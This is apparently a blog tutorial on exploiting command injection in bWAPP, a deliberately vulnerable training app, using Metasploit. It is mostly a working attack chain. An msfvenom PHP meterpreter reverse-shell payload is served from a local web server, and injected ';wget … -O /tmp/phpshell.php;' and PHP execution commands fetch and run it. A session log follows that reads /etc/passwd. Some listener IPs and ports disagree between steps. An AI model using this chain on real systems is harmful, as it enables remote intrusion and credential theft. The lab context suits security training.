Commnad injection: How to use Metasploit Penetration Testing Software to find security vulnerabilities (Metasploit with bWAPP)

Metasploit is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.(wiki)
In this post we will use metasploit tool and spot command injection vulnerabilities in bWAPP. Our goal is to place a shell in application directory and execute the same, gets a reverse connection.

Step 1: - First we create a “php shell” with msfvenom(combination of Msfpayload and Msfencode). Execute following command in terminal(From metaspolit installation/apps).Below command generates a file phpshell.php.( payload which is used in later steps).

sudo ./msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.213.142 LPORT=7654 -e php/base64 -f raw > /home/zytham/Desktop/phpshell.php

[zytham@s158519-vm app]$ ls
gem  msfbinscan  msfd        msfirb       msfpescan  msfrpcd    msfvenom
irb  msfconsole  msfelfscan  msfmachscan  msfrpc     msfupdate  ruby
[zytham@s158519-vm app]$ sudo ./msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.213.142 LPORT=7654 -e php/base64 -f raw > /home/zytham/Desktop/phpshell.php
[sudo] password for zytham:
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1291 (iteration=0)
php/base64 chosen with final size 1291
Payload size: 1291 bytes

Step 2: - Now edit this phpshell.php file and enclose its content under php tag as shown below.

Step 3:- Setup a web-Server and place the phpshell at that location. We can setup a webserver  using following command. Execute following command in terminal where we have placed phpshell file.

sudo python -m SimpleHTTPServer 80

[zytham@s158519-vm CIV]$ sudo python -m SimpleHTTPServer 8088
[sudo] password for zytham:
Serving HTTP on 0.0.0.0 port 8088 ...

Check for server is running and shell is listing. 

Step 4:- Set up a meterpreter listener on our machine (Here we have setup listener on same IP as hosted this phpshell.php) Execute following command from metaspoilt installation directory (from apps directory).On success we get into Metasploit console window.
[zytham@s158519-vm app]$ sudo ./msfconsole
[sudo] password for zytham:
                                               
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
       =[ metasploit v4.13.25-dev                         ]
+ -- --=[ 1625 exploits - 925 auxiliary - 282 post        ]
+ -- --=[ 472 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

Step 5:- Execute following command and setup meterpreter listener. Output of commands has been shown in below screenshot.
msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.213.141
msf exploit(handler) > set LPORT 1234
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
 msf exploit(handler) > exploit

Step 6:- Copy (download) phpshell.php created locally to Web application server node using following command in command injection html UI.
;wget http://192.168.213.142:8088/phpshell.php -O /tmp/phpshell.php;


Same can verified by executing following command (shown in screenshot)
;ls -l /tmp/ phpshell.php

Step 7:- Now execute following command via application (DNS lookup text box) and make a reverse connection by executing script placed in previous step.On successful connection we obtain meterpreter terminal.

;/opt/lampp/bin/php -f /tmp/phpshell.php

Below are the terminal changes when above command is executed successfully in UI(DNS lookup)
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.213.142:7654
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 192.168.213.142
[*] Meterpreter session 1 opened (192.168.213.142:7654 -> 192.168.213.142:49944) at 2017-04-10 23:21:59 +0530
meterpreter >
meterpreter > sysinfo
Computer    : s158519-vm.localvm.com
OS          : Linux s158519-vm.localvm.com 3.10.0-327.4.4.el7.x86_64 #1 SMP Tue Jan 5 16:07:00 UTC 2016 x86_64
Meterpreter : php/linux
meterpreter > pwd
/opt/lampp/htdocs/vulnerable-web
meterpreter > cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
...........................

From above we can see that we can successfully execute OS command once shell is executed successfully and reverse connection is obtained.

2 Comments

Previous Post Next Post